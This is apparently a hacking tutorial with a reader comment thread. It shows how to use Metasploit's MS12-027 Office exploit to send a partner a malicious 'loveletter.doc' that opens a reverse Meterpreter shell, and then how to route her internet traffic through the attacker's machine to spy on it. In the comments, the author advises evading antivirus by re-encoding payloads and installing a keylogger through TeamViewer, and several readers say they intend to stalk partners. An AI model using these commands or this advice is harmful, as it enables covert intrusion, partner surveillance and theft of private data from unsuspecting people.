Welcome back, my hacker apprentices!
Several of you have written asking me how you can check on whether your boyfriend, girlfriend, or spouse is cheating on you, so I dedicate this tutorial to all of you with doubts about the fidelity of your spouse, girlfriend, or boyfriend.
A Fair Warning
Before I start, I want to point out that hacking into somebody's computer is illegal in most countries. What might be the consequences for hacking into a friend's or spouse's computer? Kelly Terry, one of our Null Byte community members, has firsthand experience with her husband, who's now paying a heavy price. She recounts her experience on her blog.
I'm not a relationship counselor or anything of that sort, but if you're worried that your partner is cheating on you, there are only two possibilities. First, they are NOT cheating on you and your paranoia is destructive to the relationship. Second, they ARE cheating on you and you should get out of the relationship.
My point here is that if you're obsessed with jealousy in your relationship, you should either remove that feeling or leave the relationship. Hacking their machine to find evidence is only likely to make the situation worse because you could...
- End up in prison like Kelly Terry's husband,
- Find nothing, but that won't relieve the anxiety and jealousy, or
- Find something, and you knew all along that the relationship was bad for you.
None of these outcomes are good!
Just a warning.
The instructions below are merely for learning purposes.
Step 1: Compromise Her System
Let's fire up BackTrack and Metsploit and figure out a way to compromise her system.
A couple of years back (April 2012), an exploit was found in the wild that you could create a buffer overflow (I'll be doing a tutorial to explain buffer overflows soon) in Windows 7 systems with Office 2007 or Office 2010. Since I know my girlfriend has Windows 7 and Office 2007 on her computer, this just might be the perfect exploit to use on her.
In addition, I often send her little love letters as attachments, so she will not suspect anything if I send another. This time, though, I will embed the Meterpreter so that I can "own" her system and check up on her.
Of course, I think it goes without saying (maybe not?) that this exploit will work with anyone that trusts you enough to open your Word document. Similar tactics are used by spammers and scammers all the time.
When this vulnerability was found in the wild, Microsoft designated it MS12-027. Metasploit developers then wrote an exploit for Metasploit that does exactly the same thing and named it ms12_027_mscomctl_bof. If we want to use it to exploit our girlfriend's computer, we can find it by typing at the msfconsole:
- msf > search ms12_027
This should retrieve just one exploit as above. To avoid typographical errors, simply copy and paste it into the next line like I have done above.
Step 2: Let's Get Some Background Info
If I'm new to an exploit, I like to learn a little about what it does before I start. Let's type:
- msf > info
Notice that this exploit has two potential targets, Microsoft Office 2007 (target 0) and Microsoft Office 2010 (target 1). In addition, in the description it states:
"This module exploits a stack buffer overflow in MSCOMCTL.OCX. It uses a malicious RTF to embed a specially crafted..."
Notice that it also states "The DEP/ASLR bypass on Office 2010...". For those of you are unfamiliar, DEP is Data Execution Prevention and ASLR is Address Space Layout Randomization. Both are implemented on most operating systems to prevent exactly what we are doing here.
Step 3: Show Targets & Create Doc
Since we're pretty certain she uses Office 2007 and not Office 2010, let's set our target for 2007.
- set target 0
Now, rather than use the generic msf.doc that comes with this exploit, let's give it a name that will entice her to open it. Let's call it loveletter.doc.
- set FILENAME loveletter.doc
We next have to give it a payload and tell it what system it needs to connect back to (LHOST) when she opens it.
- set PAYLOAD windows/meterpreter/reverse_tcp
- set LHOST 192.168.1.111
With all the options set, we type exploit and Metasploit creates our malicious document and places it in the /root/.msf/local directory with a name we gave it, loveletter.doc.
Step 4: Multi Handler
Now that we have the malicious Word file created called loveletter.doc, we next need to open a multi-handler on our Metasploit system to receive the connection when she opens the file.
- use exploit/multi/handler
- set PAYLOAD windows/meterpreter/reverse_tcp
- set LHOST 192.168.1.111
- exploit
Now, as you can see, Metasploit has a listener waiting for a connection from the girlfriend's computer. Let's email her that loveletter.doc and when she opens that file, it will create a Meterpreter session on our computer and we will own her system!
As you can see, she opened the file and a Meterpreter session opened on our computer. We own her system!
Step 5: Verify It's the Right Computer
Just to make certain we're on the right computer, let's get the sysinfo:
- meterpreter > sysinfo
As you can see, it tells us that the system we have compromised is a Windows 7 64-bit computer. That's her machine!
Step 6: Forward Her Internet Traffic Back Through Us
Now that we have control of her system, you can forward all her Internet traffic through your computer. In this way, you can sniff her traffic and search for telltale signs of cheating, such as keywords. You might even setup an intrusion detection system on her traffic looking for keywords that will alert you.
First, forward her traffic to you by typing at the Meterpreter prompt:
- meterpreter> portfwd add -L 192.168.1.100 -l 80 -r 192.168.1.111 -p 80
Next, we need to forward all traffic from her through our computer out to the Internet. We can do that by turning on ipforwarding on on our system. We do that by typing:
- bt > echo 1 /proc/sys/net/ipv4/ipforward
Step 7: Search for Keywords
Now that all her traffic is going through your system, you can view her traffic through Wireshark to see what sites she is visiting and even better, set up Snort to look for keywords in her TCP stream going through our computer.
So now, my hacker apprentices, we have several different ways to hack Windows 7 systems, but we still have more, so keep coming back.
Just updated your iPhone to iOS 18? You'll find a ton of hot new features for some of your most-used Apple apps. Dive in and see for yourself:
52 Comments
Just a thought, if you have to ask yourself if your girlfriend is cheating. Perhaps the better option is to end the relationship rather then stalk her. Trust is an integral part of a working and healthy relationship.
Well this section is not about social relationships. It is about system penetration and exploit. So the title could be something like
Hack Like a Pro: How to Hack Windows 7 to See Whether Your Best friend wants to kill you.
So plz stop starring at a tree when you have a whole forest in front of you.
OTW makes random examples just to make something more interesting and attractive.
Thanks Jim. You hit the nail on the head!
powershell is a joke.
Hello Master I have this problem ;
any help please
Is that really your IP address? Seems odd that you have the same address as the example.
Did you send the loveletter to her? Did she open it?
i have a problem, i started to using kali today, and i want to make a joke to a friend. utilizing this tutorial to exploit his computer and https://null-byte.wonderhowto.com/how-to/hack-like-pro-haunt-your-bosss-computer-drive-him-insane-0147958/ this to kill the some process and open the notepad. but i have a problem, my antivirus detect the document created in this tutorial is a virus. how can i solve it?
Append the data to an .exe that is not getting flagged, when he opens hes done.
Rui:
You need to re-encode the exploit to change the signature. I have couple of tutorials on that;
https://null-byte.wonderhowto.com/how-to/hack-like-pro-change-signature-metasploit-payloads-evade-antivirus-detection-0149867/
https://null-byte.wonderhowto.com/how-to/hack-like-pro-bypass-antivirus-software-by-disguising-exploits-signature-0141122/
OTW
Master ;
how can I get the love letter to send her ? I was looking for in file manager I can't see msf4 folder
X:
Notice that it begins with period (.). That means it's a hidden file. To see hidden files in Linux, you can type;
ls -al
OTW
Master ;
So If type : ls -al
I can take it to send her ?
No, if you type ls -al, you can find it.
You can attach it to an email, just like any other attachment.
Master :
how can I do that ? I tried to find the love letter but nothing
Look in the directory that you created it in.
any command for that please ?
how can i get in /root/.msf4/local/loveletter.doc ? to get the love letter to send to the victim please ?
687 Bash commands Reference Here.
Basic Linux in a nutshell Here
X: I love BT3 R2 out of all distros but you need to upgrade bro, you will get intermittent results on your tests till you do.
As far as the GUI tools you will lose you can re install them. Learn how to use the base scripts just as well. Moving away from GUI was the best thing ever.
Deleted changed my mind on this remark
X:
Your questions go to basic Linux and computer skills. You can't expect the readers here to assist you in such basic skills. You need to invest time in developing these skills. This forum is designed for hacking questions.
Have you read and studied my Linux series? I think that would be very helpful to all of your questions.
OTW
Hi Sebastian
I dont understand some steps.
i was on this project all day and i couldnt get a good result.
I already did the word doc with the default payload like it says on this tutorial, i encoded a payload in executable extension that is not caught by AV. but now my problem is how i can use this payload on the archieve? what i need to do to make this two files in one file to send to the target?
i know that after sending the file to the target i need to open a listener.
EDIT1: i searched in google and i saw some people talking about bind a file with another file. so in my case i suppose i could bind the payload that i encoded with the doc and send to the victim. Im right? There is another way?
Its a doc file so simply email it as an attachment.
but my problem is what i do with the executable payload.
I have two files at the moment, a payload exe and a doc.
I don't get it. In this tutorial, you only created a doc file. Where did the exe come from? Did you re-encode the doc to an exe?
i reencoded the payload, i followed this tutorial https://null-byte.wonderhowto.com/how-to/hack-like-pro-bypass-antivirus-software-by-disguising-exploits-signature-0141122/ to avoid the av security.
OK. Now use that payload to put into the doc. in Step #3.
But i dont know how to put my payload, i know that is in that command but i dont know how. "set PAYLOAD windows/meterpreter/reversetcp"
EDIT1:i think i got something, i need to put my payload on meterpreter directory, and switch the name, "reversetcp for the name of my payload. but the problem is, i dont know what is the meterpreter payload's directory.
EDIT2: a exe payload works with a doc file?
Rui:
You are on the right track. Check out this tutorial on Metasploit .
A exe payload should work, but it will probably get detected by an AV software.
OTW
after some time, i already got the payload on the payloads directory, but when i need to set the payload on the file, i use the command "set PAYLOAD generic/Bypass" and " set PAYLOAD generic/Bypass.exe" and none of them work. my payload is on this directory "/usr/share/metasploit-framework/modules/payloads/singles/generic".
what im doing wrong
I am quite ignorant. Do I have to be connected to the same network as her or can it be done completely remotely? The localhost part and the local ip made me ask this.
You can do it completely remotely.
I can do it completely remotely as is or do I have to make changes to the procedure?
The answer is....it depends.
If you have a static IP and she has a static IP, then you can do it as is.
If you are on the same subnet, you can do it as is.
Barring those two conditions, you will have to tailor it to your conditions.
I have a local static IP and a dynamic internet IP while she has dynamic local and internet IPs. She is in a completely different city using a different ISP. I guess I could aquire her internet IP one way or another (which I guess is always the same because her modem/router runs 24/7/365). I also have access to her computer through TeamViewer when she needs me to do something (her knowledge about computers stops at what the mouse right click does). Can you instruct me how to install a listener and eventually a keylogger, master?
All the information you need is in my tutorials.
Quite honestly, if you have access to her computer via TeamViewer, you don't need anything else. Simply upload a keylogger to her computer and you are done.
Can you please recommend a keylogger that is invisible and can email me the logs? (preferably for free). Google doesn't seem to do it for me in this occasion (and neither does wonderhowto for that matter) Desperate stalker in need. Have been successfully using a lot of your WPA cracking guides in Kali with connectify to increase my DL speed though :) Only when nobody else is using their net of course (nearly)
Sir OTW, in this tutorial what LHOST and RHOST stands for? Because in my understanding L is the victim's IP and R is the attacker's IP. Am i right?
No, RHOST stands for Remote Host, the victim's computer.
OTW
Since you suggested me to learn your basic linux how to find loveletter.doc (I used this syntaxe "cp -rf loveletter.doc ~/Desktop") from directory finally I did it and m glad to tell you I'm able to see whether my girlfriend is cheating or not thx for all again and keep going with your great tutorial.
X
So I tried this one and sent it to a Win7 SP1 with office 2010.
Had to stop de AV (avira) on that PC (also mine) cause it detects it without any problems.
I proceeded in running it and it clearly did something cause office crashed. Back at kali no sessions where opened whatsoever. Is it because of the 2010 and not 2007 version ? Or is the exploit simply too old?
There are many possibilties of why it didn't connect, but the fact that office crashed tells you it is vulnerable.
Make certain that you set the lhost and target correctly.
set target 1 (cause its office 2010)
LHOST directly taken from ifconfig to avoid misspelling.
Target system should be compatible but my knowledge doesn't take me further at the moment.
Another newbie question: lets say I hit exit, close msf then start again and want to get back trying with an earlier exploit. if I am in msf and say the girlfriend opens the .doc file would it still do something?
PS : there's a question here too: https://null-byte.wonderhowto.com/how-to/hack-windows-7-sending-vulnerable-shortcut-files-0150797/
Hi , i just want to know the method how to map your external IP into your local IP using NAT..not able to find a clear tutorial as in java and other exploits its creating a link with local IP address..
Thanks in advance
Try using port mapping on your router.
Hi, i have BT and Kali, i would like to get access in someones system by victim clicking a link ,or not doing anything at all,or opening a .doc,.pdf or photo. And must be FUD, i don't want to risk all.. Any suggestions would be appreciated. Should i use java applet? i am not experienced. I might be able to find victim ip's but not rely on it..i am thinking by clicking a link and i get a connection back ,must be fud. any ideas? my ym is: shiva.death@yahoo.com , skype mr.icarus27
Our college has set a proxy server for all the network connections.. When I use the payload 'windows/meterpreter/reversetcp'
the target's PC keeps sending the requests to the proxy server Any suggestions how to overcome this?
192.168.121.53 is the proxy used in my college
a very important question to thread's OP.
1st thanks for such wonderful knowledge..
I was little confused that system i am at keep changes its internal IP each time I reboot or get disconnected from network somehow, as am not wifi always...
so if my IP keeps changing how can I interact/reverse tcp with the victim ?? any suggestions will be appreciated...
Hello all!
im using metasploit v4.11.21 on ubuntu
i have a problem to open the file on the victim side
> using win 7 sp3 with office 2007 sp3
before i send it over an email i change its permissions to allow all
when i open the doc file it accuses that the file have permissions
and when i quit it the file suddenly desappear
I wonder is it a way to remote control command to eject the victim cd-rom player after we hack in to the pc with Metasploit.. Just wanna give victim surprise that his cd-rom drv suddenly open and close.. I still remember long time ago that hack tool "Back Orifice" which allow hacker to remote control victim cd-rom drive.. or shutdown the victim pc..
Hello sir.
I was wondering if we can check what sites the victim visits by knowing his ip address? I only have access to her facebook and somehow find out her ip address by messaging her (if its possible). But chances of her opening any file is little to no as she is very cautious. Is there a tutorial where I can learn how to find out ip address from messaging on facebook? And how to get hold of what she visits by knowing her ip?
Share Your Thoughts